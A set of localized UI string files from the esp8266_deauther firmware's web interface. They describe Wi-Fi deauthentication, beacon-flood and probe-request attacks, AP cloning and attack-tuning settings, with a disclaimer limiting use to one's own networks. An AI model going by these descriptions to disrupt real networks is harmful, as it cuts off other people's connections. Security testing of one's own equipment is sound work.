"setting_password": "Passwort des Access-Points für Webinterface (wenn aktiviert).\nDie Länge muss zwischen 8 und 31 Zeichen sein.",
"setting_channel": "Standard WiFi-Kanal der beim Starten genutzt wird.",
"setting_hidden": "Versteckt Access-Point für Webinterface (wenn aktiviert).",
"setting_captivePortal": "Aktiviert Captive-Portal für Webinterface (wenn aktiviert).",
"setting_autosave": "Aktiviert automatisches Speichern der SSIDs, Geräte und Einstellungen.",
"setting_autosavetime": "Zeitintervall für automatisches Speichern in Millisekunden.",
"setting_display": "Aktiviert Display-Interface.",
"setting_displayTimeout": "Zeit in Sekunden nachdem das Display automatisch ausschaltet, wenn inaktiv.\nZum Deaktivieren des Timeouts, setze es auf 0.",
"setting_serial": "Aktiviere Serial-Interface.\nEs wird empfohlen es immer aktiviert zu lassen!",
"setting_serialEcho": "Erlaubt Echo für jede Nachricht über die serielle Verbindung.",
"setting_web": "Aktiviert Webinterface.",
"setting_webSpiffs": "Aktiviert SPIFFS für alle Web-Dateien.",
"setting_led": "Aktiviert (RGB-)LED.",
"setting_maxch": "Max. Kanal zum Scannen.\nUS = 11, EU = 13, Japan = 14.",
"setting_macAP": "MAC-Adresse für Access-Point-Modus.\nBeachte, dass die Adresse nur angewendet wird wenn der Access-Point-Modus aktiviert ist.",
"setting_macSt": "MAC-Adresse für Station-Modus.\nBeachte, dass die Adresse nur angewendet wird, wenn der Station-Modus aktiviert ist.",
"setting_chtime": "Scan-Zeit in Millisekunden für einen Kanal, bevor zum nächsten gewechselt wird (nur wenn Channel-Hopping aktiviert ist).",
"setting_minDeauths": "Minimale Anzahl an Deauthentication-Frames beim Scannen, um den LED-Modus zu ändern.",
"setting_attacktimeout": "Nach wie viel Sekunden die Attacke automatisch gestoppt wird.\nSetze es auf 0 um diese Funktion zu deaktivieren.",
"setting_forcepackets": "Wie oft versucht werden soll ein Paket zu versenden.\nÄndere diesen Wert um weine bessere Paketrate zu erreichen.\nSei Vorsichtig, diese Einstellung kann das Gerät langsamer machen.\nDer maximal Wert ist 255!",
"setting_deauthspertarget": "Wie viele Deauthentication- und Disassociation-Frames für jedes Ziel versendet werden sollen.",
"setting_deauthReason": "Der Reason-Code beim Versenden der Deauth-Pakete um dem Ziel zu sagen, warum die Verbindung getrennt wird.",
"setting_beaconchannel": "Wenn aktiviert, sendet Beacon-Pakete auf verschiedenen Kanälen.",
"setting_beaconInterval": "Wenn aktiviert, versendet je SSID ein Beacon-Pakete jede Sekunde. Sonst alle 100ms.\nEin größeres Intervall bedeutet mehr Stabilität und weniger Paket-Spamming, aber es könnte länger dauern bis Client-Geräte die Netzwerke finden.",
"setting_randomTX": "Aktiviert zufällige Sendeleistung für Beacon-Pakete und Probe Requests.",
"setting_probesPerSSID": "Wie viele Probe Requests pro SSID versendet werden sollen.",
"setting_lang": "Standardsprache für Webinterface.\nSei sicher, dass eine passende Sprachdatei existiert!"
} |
|
esp8266_deauther-2/web_interface/lang/en.lang | {
"lang": "en",
"warning": "WARNING",
"disclaimer": "This project is a proof of concept for testing and educational purposes.\nNeither the ESP8266, nor its SDK was meant or build for such purposes. Bugs can occur!\n\nUse it only against your own networks and devices!\n\nIt uses valid Wi-Fi frames described in the IEEE 802.11 standard and does not block or disrupt any frequencies.\nPlease check the legal regulations in your country before using it.\n\nPlease don't refer to this project as \"jammer\", that totally undermines the real purpose of this project!\nIf you do, it only proves that you didn't understand anything of what this project stands for.\nPublishing content about this without without a proper explanation shows that you only do it for the clicks, fame and/or money and have no respect for intellectual property, the community behind it and the fight for a better WiFi standard.\n\nFor more information visit:",
"disclaimer-button": "I have read and understood the notice above",
"reload": "Reload",
"scan": "Scan",
"ssids": "SSIDs",
"attacks": "Attacks",
"settings": "Settings",
"info": "Info",
"info_span": "INFO: ",
"all": "All",
"channel": "Channel",
"devices": "Saved Devices",
"select_all": "Select All",
"deselect_all": "Deselect All",
"remove_all": "Remove All",
"station_scan_time": "Station Scan Time",
"new": "New",
"save": "Save",
"add": "Add",
"add_selected": "Clone selected APs",
"overwrite": "Overwrite",
"time_interval": "Time Interval",
"number": "Number",
"targets": "Targets",
"scan_info": "- Click Scan and wait until the blue LED on your board turns off (or changes to green), then click on Reload.\n- The web interface will be unavailable during a station scan and you will have to reconnect!\n- Please select only one target!\n",
"ssids_info": "- This SSID list is used for the beacon and probe attack.\n- Each SSID can be up to 32 characters.\n- Don't forget to click save when you edited a SSID.\n- You have to click Reload after cloning SSIDs.\n",
"attack_info": "- You might lose connection when starting an attack!\n- You need to select a target for the deauth attack.\n- You need a saved SSID for the beacon and probe attack.\n- Click reload to refresh the packet rate.\n",
"settings_info": "- Some settings require a reboot.\n- Click save to make sure that your changes are applied.\n",
"info_disclaimer": "In case of an unexpected error, please reload the site and look at the serial monitor for further debugging.",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "WiFi Off",
"reboot": "Reboot",
"reset": "Reset",
"enable_random": "Enable Random Mode",
"disable_random": "Disable Random Mode",
"random_desc": "Enable the random mode to generate a random SSID list in a given interval.",
"deauth_desc": "Closes the connection of WiFi devices by sending deauthentication frames to access points and client devices you selected.\nThis is only possible because a lot of devices don't use the 802.11w-2009 standard that offers a protection against this attack.\n- Please only select one target! When you select multiple targets that run on different channels and start the attack, it will quickly switch between those channels and you have no chance to reconnect to the web interface.\n",
"beacon_desc": "Beacon packets are used to advertise access points. By continuously sending beacon packets out, it will look like you created new WiFi networks.\nYou can specify the network names under SSIDs.",
"probe_desc": "Probe requests are sent by client devices to ask if a known network is nearby.\nUse this attack to confuse WiFi trackers by asking for networks that you specified in the SSID list.\nIt's unlikely you will see any impact by this attack with your home network.",
"setting_version": "Version number, i.e. v2.0.\nThis setting can only be changed in the source code.",
"setting_ssid" : "SSID of access point used for the web interface (if enabled).\nThe length must be between 1 and 31 characters.",
"setting_password": "Password of access point used for the web interface (if enabled).\nThe length must be between 8 and 31 characters.",
"setting_channel": "Default WiFi channel that is used when starting.",
"setting_hidden": "Hides the access point that is used for the web interface (if enabled).",
"setting_captivePortal": "Enables captive portal for access point (if enabled).",
"setting_autosave": "Enables automatic saving of SSIDs, device names and settings.",
"setting_autosavetime": "Time interval for automatic saving in milliseconds.",
"setting_display": "Enables display interface.",
"setting_displayTimeout": "Time in seconds after which the display turns off when inactive.\nTo disable the display timeout, set it to 0.",
"setting_serial": "Enables serial interface.\nIt's recommended not to disable it!",
"setting_serialEcho": "Enables echo for each incoming message over serial.",
"setting_web": "Enables web interface.",
"setting_webSpiffs": "Enables SPIFFS for all web files.",
"setting_led": "Enables the (RGB) LED feature.",
"setting_maxch": "Max. channel to scan on.\nUS = 11, EU = 13, Japan = 14.",
"setting_macAP": "MAC address used for the access point mode.\nPlease note that the MAC address will only replace the internal MAC address when the accesspoint mode is enabled.",
"setting_macSt": "MAC address used for the station mode.\nPlease note that the MAC address will only replace the internal MAC address when the station mode is enabled.",
"setting_chtime": "Time for scanning one channel before going to the next in milliseconds (only if channel hopping is enabled).",
"setting_minDeauths": "Minimum number of deauthentication frames when scanning to change the LED to deauth mode.",
"setting_attacktimeout": "After what amount of time (in seconds) the attack will stop automatically.\nSet it to 0 to disable it.",
"setting_forcepackets": "How many attempts to send out a packet.\nSet this value higher if you want to achieve a better packet rate in a busy area.\nBe careful this setting could make the device slower or more unstable.\nMax value is 255!",
"setting_deauthspertarget": "How many deauthentication and disassociation frames are sent out for each target.",
"setting_deauthReason": "The reason code that is sent with the deauth frames to tell the target device why the connection will be closed.",
"setting_beaconchannel": "If enabled, will send all frames on different channels when running a beacon attack.",
"setting_beaconInterval": "If set true, beacons will be sent out every second. If set to false, the interval will be 100ms.\nA longer interval means more stability and less spamming of packets, but it could take longer until the clients find the ssids when scanning.",
"setting_randomTX": "Enables randomized transmission power for sending out beacon and probe request frames.",
"setting_probesPerSSID": "How many probe request frames are sent for each SSID.",
"setting_lang": "Default language for the web interface.\nBe sure the language file exists!"
} |
|
esp8266_deauther-2/web_interface/lang/es.lang | {
"lang": "es",
"warning": "ADVERTENCIA",
"disclaimer": "Este proyecto es una prueba de concepto con un motivo didáctico y experimental. \nNi el modulo ESP8266, ni su relativo SDK fueron creados o proyectados para estos propósitos.\n\n¡Úsalo solo contra tus propias redes y dispostivos! \n\nEl software utiliza exclusivamente los marcos WiFi válidos descritos en el estándar IEEE 802.11 de manera que no se bloquea o interrumpe frecuencia alguna. \nPor favor, verifica la regulación vigente de tu país antes de utilizarlo. \n\nPor favor no referirse a este proyecto como \"jammer\" o \"inhibidor\", esto iría completamente en contra de la verdadera finalidad del proyecto\nSi lo haces tan solo demostarás no haber entendido absolutamente nada de lo que este proyecto representa. \nPublicar contenido sin una explicación adecuada demuestra que tan solo se hace por los clics, fama y/o dinero y que no se tiene ningún respeto por la propriedad intelectual, la comunidad detrás de ello y la lucha por un mejor estándar WiFi. \n\nPara más información visita:",
"disclaimer-button": "He leído y entendido el aviso anterior",
"reload": "Actualizar",
"scan": "Escanear",
"ssids": "SSIDs",
"attacks": "Ataques",
"settings": "Configuración",
"info": "Informacón",
"info_span": "INFO: ",
"all": "Todo",
"channel": "Canal",
"devices": "Dispositivos guardados",
"select_all": "Seleccionar todo",
"deselect_all": "Deseleccionar todo",
"remove_all": "Quitar todo",
"station_scan_time": "Tiempo de escaneo de la estación",
"new": "Nuevo",
"save": "Guardar",
"add": "Agregar",
"add_selected": "Clonar los APs seleccionados",
"overwrite": "Sobrescribir",
"time_interval": "Intervalo de tiempo",
"number": "Número",
"targets": "Objetivos",
"scan_info": "- Haz clic en Escanear y espera hasta que el led azul en la placa se apague (o cambie a verde), luego haz clic en Actualizar.\n- ¡La interfaz web no estará disponible durante el escaneo de una estación y tendrás que reconectarte!\n- ¡Selecciona solo un objetivo!\n",
"ssids_info": "- Esta lista SSID se utiliza para los ataques de tipo 'Beacon' y 'Probe'.\n- Cada SSID puede contener hasta 32 caráteres.\n- No olvides hacer clic en Guardar cuando se modifique un SSID.\n- Tienes que hacer clic en Actualizar después de clonar un SSID.\n",
"attack_info": "- ¡Puede que pierdas la conexión al iniciar el ataque!\n- Tienes que seleccionar un objetivo para el ataque de tipo 'Deauth'.\n- Se necesita un SSID guardado para el ataque tipo 'Beacon' o 'Probe'.\n- Haz clic en Actualizar para refrescar la velocidad de los paquetes.\n",
"settings_info": "- Algunas configuraciones necesitan un reinicio.\n- Haz clic en Guardar para asegurar que las modificaciones sean aplicadas.\n",
"info_disclaimer": "En caso de error, actualiza la página y echa un vistazo al monitor serial para una depuración más detallada.",
"start_stop": "INICIAR / DETENER",
"start": "INICIAR",
"stop": "DETENER",
"wifi_off": "Apagar WiFi",
"reboot": "Reiniciar",
"reset": "Restablecer",
"enable_random": "Habilita el modo aleatorio",
"disable_random": "Deshabilita el modo aleatorio",
"random_desc": "Habilitar el modo aleatorio para generar una lista SSID aleatoria en un intervalo dado.",
"deauth_desc": "Cierra la conexión de los dispositivos WiFi enviando los marcos de desautenticación a los APs y a los dispositivos clientes seleccionados.\nEsto es posible solo porque muchos dispositivos no utilizan el estándar 802.11w-2009, que ofrece una protección contra este tipo de ataque.\n- ¡Por favor, seleccione solo un blanco! Cuando se seleccionan más blancos que son llevados a cabo sobre canales diversos e inicia el ataque, pasará rápidamente de estos canales y no tendrá posibilidad alguna de reconectarse a la interfaz web.\n",
"beacon_desc": "Los paquetes 'Beacon' son utilizados para publicitar los APs. Enviando continuamente paquetes 'Beacon', parecería que se han creado nuevas redes WiFi.\nEs posible especificar los nombres de red bajo SSID.",
"probe_desc": "Las peticiones 'Probe' son enviadas por los dispositivos clientes para preguntar si una red determinada se encuentra al alcance.\nUtiliza este ataque para confundir los 'trackers' WiFi preguntando por redes especificadas en la lista SSID.\nEs improbable que no veas algún impacto de este ataque en tu red doméstica.",
"setting_version": "Número de versión, por ejemplo v2.0.\nEste ajuste sólo puede ser modificado en el código fuente.",
"setting_ssid" : "SSID del AP utilizado para la interfaz web (si habilitado).\nEl tamaño debe comprender entre 1 y 31 caracteres.",
"setting_password": "Contraseña del AP utilizada para la interfaz (si habilitado).\nEl tamaño debe comprender entre 8 y 31 caracteres.",
"setting_channel": "Canal WiFi predefinido que es utilizado al inicio.",
"setting_hidden": "Oculta el AP utilizado para la interfaz web (si habilitado).",
"setting_captivePortal": "Habilita el portal cautivo para el AP (si habilitado).",
"setting_autosave": "Habilita el guardado automático de SSID, nombres de dispositivos y configuraciones.",
"setting_autosavetime": "Intervalo de tiempo para el guardado automático en milisegundos.",
"setting_display": "Habilita la interfaz de la pantalla.",
"setting_displayTimeout": "Tiempo en segundos tras los que la pantalla se apaga al estar inactiva.\nPara deshabilitar el timeout de la pantalla, configurarlo en 0.",
"setting_serial": "Habilita la interfaz serial.\n¡Se recomienda no desactivarla!",
"setting_serialEcho": "Habilita la muestra de cada mensaje recibido por serial.",
"setting_web": "Habilita la interfaz web.",
"setting_webSpiffs": "Habilita SPIFFS para todos los archivos web.",
"setting_led": "Habilita la función led (RGB).",
"setting_maxch": "Canal máximo para el escaneo.\nEEUU = 11, EU = 13, Japón = 14.",
"setting_macAP": "Dirección MAC utilizada para el modo AP.\nLa dirección MAC reemplazará la MAC interna tan solo cuando el modo AP este habilitado.",
"setting_macSt": "Dirección MAC utilizada para el modo estación.\nLa dirección MAC reemplazará la MAC interna tan solo cuando el modo estación este habilitado.",
"setting_chtime": "Tiempo de escaneo de un canal antes di pasar al sucesivo en milisegundos (sólo si el pase de canales está habilitado).",
"setting_minDeauths": "Número mínimo de marcos de desautentifiación durante el escaneo para cambiar el modo led en 'Deauth'.",
"setting_attacktimeout": "Después de cuanto tiempo (en segundos) el ataque se detendrá automaticamente.\nConfigurarlo en 0 para deshabilitarlo.",
"setting_forcepackets": "Cuantos tentativos de envío de un paquete.\nConfigurar este valor más alto si se desea obtener una mejor velocidad de paquetes en un área ocupada.\nCuidado, esta configuración puede hacer que el dispositivo vaya más lento o hacerlo más inestable.\n¡El valor máximo es 255!",
"setting_deauthspertarget": "Cuantos marcos de desautentifiación y desasociación son enviados para cada blanco.",
"setting_deauthReason": "El código de motivo que se envía con los marcos tipo \"deauth\" para indicar al dispositivo de destino por qué la conexión será terminada.",
"setting_beaconchannel": "Si se habilita, se enviarán todos los marcos en diferentes canales durante la ejecución de un ataque tipo 'Beacon'.",
"setting_beaconInterval": "Habilitado los Beacons serán enviados cada segundo. Deshabilitado, el intervalo será de 100 ms.\nUn intervalo más largo significa mayor estabilidad y menos 'spammeo' de los paquetes, pero podría nesecitar más tiempo hasta que los clientes encuentren los SSID durante el escaneo.",
"setting_randomTX": "Habilita la potencia de transmisión aleatoria para el envío de peticiones de marcos 'Beacons' y 'Probe'.",
"setting_probesPerSSID": "Cantidad de marcos de peticiones 'Probe' enviados para cada SSID.",
"setting_lang": "Idioma predefinido para la interfaz web.\n¡Verifica que el archivo del idioma exista previamente!"
} |
|
esp8266_deauther-2/web_interface/lang/fi.lang | {
"lang": "fi",
"warning": "VAROITUS",
"disclaimer": "Tämä laite on tarkoitettu verkon turvallisuustestien tekemiseen, eikä verkon murtautumiseen! ",
"disclaimer-button": "Olen lukenut ja käytän laitetta oikein",
"reload": "Lataa Uudelleen",
"scan": "Skannaa",
"ssids": "SSID:t",
"attacks": "Hyökkäykset",
"settings": "Asetukset",
"info": "Info",
"info_span": "INFO: ",
"all": "Kaikki",
"channel": "Kanavat",
"devices": "Tallennetut Laitteet",
"select_all": "Valitse Kaikki",
"deselect_all": "Poista valinnat",
"remove_all": "Poista Kaikki",
"station_scan_time": "Asemien skannausaika",
"new": "Uusi",
"save": "Tallenna",
"add": "Lisää",
"add_selected": "Kloonaa Valitut Verkot",
"overwrite": "Kirjoita päälle",
"time_interval": "Aikaväli",
"number": "Numero",
"targets": "Kohteet",
"scan_info": "- Napsauta Skannaa ja odota, kunnes sinisen LED-valo sammuu (tai muuttuu vihreäksi) ja napsauta sitten Lataa Sivu Uudelleen. \n- Web-käyttöliittymä ei ole käytettävissä asemien skannauksen aikana ja sinun on yhdistettävä uudelleen laitteeseen! \n- Ole hyvä valitse vain yksi kohde! \n",
"ssids_info": "- Tätä SSID-luetteloa käytetään Beacon- ja Probe hyökkäystä varten. \n- Jokainen SSID voi olla enintään 32 merkkiä. \n- Älä unohda klikata Tallenna, kun olet muokannut SSID-tunnuksia. \n- Sinun on napsautettava Lataa Sivu uudelleen, jos olet kloonannut SSID-tunnuksia. \n",
"attack_info": "- Voit menettää yhteyden aloittaessasi hyökkäyksen! \n- Sinun on valittava kohde deauth-hyökkäykstä varten. \n- Sinun on tallennettava SSID Beacon- ja Probe hyökkäyksiä varten. \n- Päivitä pakettien siirtonopeus napsauttamalla Lataa Sivu uudelleen. \n",
"settings_info": "- Jotkin asetukset edellyttävät uudelleenkäynnistystä..\n- Varmista, että muutokset ovat tallennettu, klikkamalla Tallenna nappia.\n",
"info_disclaimer": "Jos odottamaton virhe ilmenee, lataa sivu uudelleen ja katso laitteen sarjaportin lukijasta tulevaisuuden virheenkorjausta varten.",
"start_stop": "KÄYNNISTÄ / PYSÄYTÄ",
"start": "KÄYNNISTÄ",
"stop": "PYSÄYTÄ",
"wifi_off": "WiFi Pois",
"reboot": "Käynnistä uudelleen",
"reset": "Nollaa",
"enable_random": "Satunnainen tila päälle",
"disable_random": "Satunnainen tila pois päältä",
"random_desc": "Ota satunnaistoiminto käyttöön saadaksesi satunnaisen SSID-luettelon tietyllä kappaleväleillä (esim. 1-15 SSIDja).",
"deauth_desc": "Sulkee WiFi-laitteiden yhteyden lähettämällä autentikointikehykset valittuihin yhteyspisteisiin ja asiakaslaitteisiin.\nTämä on mahdollista vain, koska monet laitteet eivät käytä 802.11w-2009 -standardia, joka suojaa tätä hyökkäystä vastaan.\n - Valitse vain yksi kohde! Kun valitset useita kanavia, jotka toimivat eri kanavilla ja käynnistä hyökkäys, se siirtyy nopeasti näiden kanavien välillä ja sinulla ei ole mahdollisuutta yhdistää uudelleen verkkokäyttöön.",
"beacon_desc": "Beacon-paketteja käytetään tukiasemien mainostamiseen. Lähettämällä jatkuvasti beacon-paketteja ulos näyttää siltä, että olet luonut uusia WiFi-verkkoja.\nVoit muokata ja luoda omia SSID-verkkoja kohdassa SSIDt ",
"probe_desc": "Asiakkaan laitteita lähettävät koetinkyselypyynnöt kysyäkseen, onko tunnettu verkko lähellä.\nKäytä tätä hyökkäystä hämmentääkseen WiFi-seurantaohjelmia pyytämällä SSID-luettelossa määritettyjä verkkoja.\nOn epätodennäköistä, että tämä hyökkäys vaikuttaa kotiverkkoosi.",
"setting_version": "Versio, esim. v2.0.\nTämä asetus voidaan muuttaa vain lähdekoodissa.",
"setting_ssid": "Verkkokäyttöliittymän käytetyn tukiaseman SSID (jos käytössä).\nThe length must be between 1 and 31 characters.",
"setting_password": "Password of access point used for the web interface (if enabled).\nVerkon nimen pituuden on oltava 1 - 31 merkkiä.",
"setting_channel": "Oletus WiFi-kanava, jota käytetään käynnistettäessä.",
"setting_hidden": "Piilottaa Wi-FI tukiaseman, jota käytetään web-käyttöliittymässä (jos se on käytössä).",
"setting_captivePortal": "Ottaa käyttöön sidotun portaalin tukiasemalle (jos se on käytössä).",
"setting_autosave": "Mahdollistaa SSID-tunnusten, laitteen nimien ja asetusten automaattisen tallennuksen.",
"setting_autosavetime": "Automaattisen tallennuksen aikaväli millisekunteina.",
"setting_display": "Mahdollistaa käyttöliittymän näytöille (esim. OLED-näyttö).",
"setting_displayTimeout": "Aika sekunneissa, jonka jälkeen näyttö sammuu, kun se ei ole aktiivinen.\nVoit poistaa näytön aikakatkaisun käytöstä asettamalla sen arvoon 0.",
"setting_serial": "Mahdollistaa sarjaliitännän.\n Suositellaan, että sitä ei poisteta käytöstä.",
"setting_serialEcho": "Mahdollistaa jokaisen saapuvan viestin kaiun sarjamuotoon.",
"setting_web": "Ottaa käyttöön web-käyttöliittymän.",
"setting_webSpiffs": "Ottaa käyttöön SPIFFS-tiedoston kaikille web-tiedostoille.",
"setting_led": "Ottaa käyttöön (RGB) LED-ominaisuuden.",
"setting_maxch": "Max. kanava jolla skannataan.\n US = 11, EU = 13, Japani = 14.",
"setting_macAP": "MAC-osoite, jota käytetään tukiasematilassa.\n Huomaa, että MAC-osoite korvaa vain sisäisen MAC-osoitteen, kun tukiasematila on käytössä.",
"setting_macSt": "MAC-osoite, jota käytetään asematilassa.\n Katso, että MAC-osoite korvaa vain sisäisen MAC-osoitteen, kun asema on käytössä.",
"setting_chtime": "Aika skannaa yksi kanava ennen siirtymistä seuraavaan millisekunteina (vain jos kanavan hopping on käytössä).",
"setting_minDeauths": "Vähimmäismäärä autentikointikehyksiä skannauksen aikana, jotta LED-valo palautuisi pois käytöstä.",
"setting_attacktimeout": "Kun määräaika (sekunteina) hyökkäys pysähtyy automaattisesti.\n Aseta se lukuun 0 sen poistamiseksi käytöstä.",
"setting_forcepackets": "Kuinka monta yritystä paketin lähettämiseen. \n Aseta tämä arvo korkeammalle, jos haluat saavuttaa paremman pakettinopeuden kiireisellä alueella. \n Huomaa tämä asetus saattaa tehdä laitteesta hitaamman tai epävakaamman. \n Max-arvo on 255!",
"setting_deauthspertarget": "Kuinka monta deautentikointi- ja disassociation kehystä lähetetään jokaiselle kohteelle.",
"setting_deauthReason": "Syykoodi, joka lähetetään deauth-kehyksillä kertoo kohdelaitteelle, miksi yhteys suljetaan.",
"setting_beaconchannel": "Jos tämä toiminto on käytössä, lähetät kaikki kehykset eri kanaville, kun käytetään majakka-hyökkäystä.",
"setting_beaconInterval": "Jos asetetaan true, lähettimet lähetetään joka sekunti. Jos asetuksena on väärä, aikaväli on 100 ms. \n Pidempi aikaväli merkitsee pakettien vakautta ja vähemmän roskapostia, mutta saattaa kestää kauemmin, kunnes asiakkaat löytävät ssidit skannauksen aikana.",
"setting_randomTX": "Mahdollistaa satunnaistetun lähetystehon lähettämällä majakka- ja koetinkyselykehyksiä.",
"setting_probesPerSSID": "Kuinka monta koetinkyselyn kehystä lähetetään jokaiselle SSID: lle",
"setting_lang": "Web-käyttöliittymän oletuskieli. \n Varmista, että kielitiedosto on olemassa!"
} |
|
esp8266_deauther-2/web_interface/lang/fr.lang | {
"lang": "fr",
"warning": "ATTENTION",
"disclaimer": "Ce projet est seulement à but éducatif et à été conçu pour un but de démonstration seulement.\nNi l'ESP8266 ni le SDK ne sont initialement prévus pour cette utilisation. Gare aux bugs !\n\nÀ n'utiliser qu'avec votre réseau privé et sur vos propres appareils !\n\nCe projet utilise des trames WiFi valides telles que décrites dans le standard IEEE 802.11; a noter qu'aucun blocage ou brouillage n'est effectué sur les fréquences utilisées.\nVeillez à bien vérifier les lois en vigueur dans votre pays avant de vous en servir.\n\nNote: ceux qui parlent de ce projet en tant que \"brouilleur\" ou \"jammer\" ou qui copient le contenu sans fournir d'explications ne font que prouver leur méconnaissance sur le sujet ou leurs intentions de générer des titres putaclic sans respecter la propriété intellectuelle, la communauté ou l'effort fourni pour obtenir un meilleur standard WiFi.\n\nPour plus d'informations sur le sujet, rendez-vous sur:",
"disclaimer-button": "J'ai lu, compris et j'accepte le texte ci-dessus",
"reload": "Rafraîchir",
"scan": "Scanner",
"ssids": "SSIDs",
"attacks": "Attaques",
"settings": "Paramètres",
"info": "Info",
"info_span": "INFO: ",
"all": "Tous",
"channel": "Canaux",
"devices": "Appareils enregistrés",
"select_all": "Tout sélectionner",
"deselect_all": "Tout désélectionner",
"remove_all": "Tout supprimer",
"station_scan_time": "Durée du Scan des points d'accès",
"new": "Nouveau",
"save": "Enregistrer",
"add": "Ajouter",
"add_selected": "Cloner les points d'accès",
"overwrite": "Ré-écrire",
"time_interval": "Intervalle",
"number": "Nombre",
"targets": "Cibles",
"scan_info": "- Cliquer sur \"Scanner\" et attendre jusqu'à ce que la LED bleue s'éteigne ou passe au vert, puis cliquer sur \"Rafraîchir\".\n- L'interface web sera inaccessible pendant le scan des stations et il faudra probablement reconnecter le WiFi !\n- Ne sélectionner qu'une seule cible à la fois !\n",
"ssids_info": "- Les SSID dans cette liste sont utilisés pour les deux modes d'attaques Balise et Sonde.\n- Chaque SSID peut contenir jusqu'à 32 caractères.\n- Ne pas oublier d’enregistrer après l'édition :)\n- Il faut rafraîchir la page après avoir cloné un SSID.\n",
"attack_info": "- Toute attaque peut déclencher une déconnexion !\n- Il faut sélectionner une cible pour l'attaque de désauthentification.\n- Il faut au moins un SSID enregistré pour que les modes d'attaque Balise et Sonde fonctionnent.\n- Cliquer sur Rafraîchir pour mettre à jour le taux de paquets.\n",
"settings_info": "- Certains changements de paramètres nécessitent de relancer l'appareil.\n- Pensez à cliquer sur Enregistrer.\n",
"info_disclaimer": "En cas d'erreur inattendue, le moniteur série peut fournir de précieuses informations et aider au debug.",
"start_stop": "DÉMARRER / STOPPER",
"start": "DÉMARRER",
"stop": "STOPPER",
"wifi_off": "WiFi arrêté",
"reboot": "Redémarrer",
"reset": "Remise à zéro",
"enable_random": "Activer le mode aléatoire",
"disable_random": "Désactiver le mode aléatoire",
"random_desc": "Déclare un liste de SSID au hasard et à intervalle régulier.",
"deauth_desc": "Force la fermeture des appareils WiFi sélectionnés en envoyant des trames de désauthentification aux points d’accès auquel ils sont connectés.\nCette situation n'existe que parce que la majorité des appareils WiFi actuels n'implémentent pas le standard 802.11w-2009 qui offre une protection contre ce genre d'attaque.\n- Attention a ne sélectionner qu'une seule cible, sans quoi vous perdrez accès à l'interface web à cause des sauts incessants entre les différents channels.\n",
"beacon_desc": "Un paquet 'balise' est généralement utilisé pour annoncer l'existence d'un point d’accès. L'envoi incessant de paquets balise permet de faire croire à la création ininterrompue de ces réseaux WiFi.\nLes noms de ces réseaux peuvent être spécifiés dans la section SSIDs.",
"probe_desc": "Les demandes de sondes sont effectuées par l'appareil client afin de demander si un réseau connu est proche.\nCette attaque peut semer la confusion auprès des war walkers ou autres appareils de tracking WiFi, et peut être personnalisée en spécifiant une liste de SSIDs.\nElle est très peu impactante sur les réseaux domestiques.",
"setting_version": "Numéro de version, ex: v2.0.\nCe paramètre ne peut être changé qu'en recompilant le code.",
"setting_ssid": "Le SSID du point d’accès utilisé pour l'interface web (si activée).\nEntre 1 et 31 caractères, maximum 8 émojis.",
"setting_password": "Le mot de passe du point d’accès utilisé pour l'interface web (si activée).\nEntre 8 et 31 caractères.",
"setting_channel": "Le canal WiFi par défaut au démarrage.",
"setting_hidden": "Masque le point d’accès qui est utilisé pour l'interface web (si activée).",
"setting_captivePortal": "Active le portail captif pour le point d’accès (si activé).",
"setting_autosave": "Active l'enregistrement automatique des SSIDs et noms d'appareils dans les paramètres.",
"setting_autosavetime": "Intervalle de temps entre deux enregistrements automatiques (en millisecondes).",
"setting_display": "Active l'écran.",
"setting_displayTimeout": "Temps d'inactivité avant que l'écran ne s'éteigne automatiquement (en secondes).\nRenseigner 0 pour désactiver cette option.",
"setting_serial": "Active l'interface série.\nIl n'est pas recommandé de la désactiver !",
"setting_serialEcho": "Affiche chaque message reçu sur le port série.",
"setting_web": "Active l'interface Web.",
"setting_webSpiffs": "Active le SPIFFS pour chaque fichier web.",
"setting_led": "Active la LED RGB.",
"setting_maxch": "Nb Max. de canaux à scanner.\nUS = 11, EU = 13, Japon = 14.",
"setting_macAP": "Adresse MAC utilisée par le mode point d’accès.\nNote: ne remplace que l'adresse MAC interne quand le mode point d’accès est actif.",
"setting_macSt": "Adresse MAC utilisée par le mode station.\nNote: ne remplace que l'adresse MAC interne quand le mode station est actif.",
"setting_chtime": "Temps passé à scanner un channel en millisecondes (seulement si le saut de channel est activé).",
"setting_minDeauths": "Nombre minimum de trames de désauthentification détectées pendant le scan pour passer la LED en mode deauth.",
"setting_attacktimeout": "Au bout de combien de secondes l'attaque doit stopper.\nRenseigner 0 pour désactiver la limite.",
"setting_forcepackets": "Nombre d'essais pour chaque envoi de paquet.\nRenseigner une valeur plus haute dans les zones saturées.\nCe paramètre peut aussi ralentir l'appareil, voire le rendre inutilisable.\nToujours renseigner une valeur Entre 0 et 255 !",
"setting_deauthspertarget": "Combien de trames de désauthentification et dissociation sont envoyées à chaque cible.",
"setting_deauthReason": "Le code 'raison' (ou mot d'excuse) qui est envoyé avec toutes les trames de désauthentification et qui précise pourquoi la connection va être fermée.",
"setting_beaconchannel": "Affecte l'attaque Balise en distribuant les paquets sur différents channels.",
"setting_beaconInterval": "Actif: envoie des balises toutes les secondes. Inactif: envoie des balises tous les 100ms.\nPlus l'intervalle est grand plus l'ESP reste stable, et mois les effets de l'attaque se font sentir.",
"setting_randomTX": "Fait varier la puissance de transmission en mode balise, sonde ou demande de sonde.",
"setting_probesPerSSID": "Combien de demandes de sondes sont envoyées pour chaque SSID.",
"setting_lang": "Langage par défaut dans l'interface web.\nAssurez vous que le fichier de langage existe !"
} |
|
esp8266_deauther-2/web_interface/lang/hu.lang | {
"lang": "hu",
"warning": "FIGYELMEZTETÉS",
